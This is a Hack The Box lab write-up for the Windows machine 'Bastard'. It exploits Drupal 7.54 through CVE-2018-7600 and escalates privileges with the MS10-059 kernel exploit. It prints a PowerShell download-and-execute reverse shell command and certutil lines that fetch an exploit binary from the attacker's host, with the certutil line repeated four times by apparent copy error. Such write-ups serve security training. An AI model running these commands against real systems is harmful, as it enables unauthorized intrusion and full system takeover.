Bastard – Hack The Box

Overall Summary

Bastard is a Windows machine from Hack the Box that is vulnerable to RCE through Drupal and privilege escalation can be accomplished by a kernel exploit because of the lack of patches. Overall, bastard is an easy machine and it can be exploited in more than one way.

Scanning and Enumeration

A full TCP nmap scan shows three ports open.

Browsing to the HTTP server displays a login page for Drupal which nmap discovered as being version 7.

If we browse to the CHANGELOG.txt file which was also discovered by nmap we will see that the exact version is Drupal 7.54.

Exploitation

Just by looking for vulnerabilities and exploits for the 7.54 version I was able to come across

https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7600.py , a python exploit that takes advantage of vulnerability that allows to execute arbitrary code because an issue with module configurations. The exploit can be executed by only providing a URL but it executes the command “id” by default, and since this a Windows machine we will have to issue the command as a parameter, this how I executed the script.

python3 drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9/

To get a reverse shell I’ll use

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1, a PowerShell reverse shell. I’ll first host the file on my attacking machine using python simpleHTTPServer, set up my netcat listener on port 443, and finally execute the exploit script with a command to download and execute the reverse shell. This is the command I’ll include in the execution of the script:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.19:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 443" http://10.10.10.9/

I was able to successfully get a PowerShell reverse shell.

Post-Exploitation

Issuing the systeminfo command shows that the machines doesn’t have any hotfixes applied which means that a kernel exploit will most likely be used.

I used the output from the command and the tool “windows-exploit-suggester.py” and it returned different exploits.

By going down the list, I was able get the MS10-059 exploit working. The binary can be downloaded here

https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled . I uploaded this binary to the machine using certutil as follows:

certutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.execertutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.execertutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.execertutil -urlcache -f http://10.10.14.19/Chimichurri.exe Chimichurri.exe

The exploit requires to be executed with the attacking machine IP address and a port number to receive a reverse shell. This is how it’s executed:

./Chimichurri.exe 10.10.14.19 4321

After a few seconds I was able to successfully get a reverse shell as “nt authority\system”.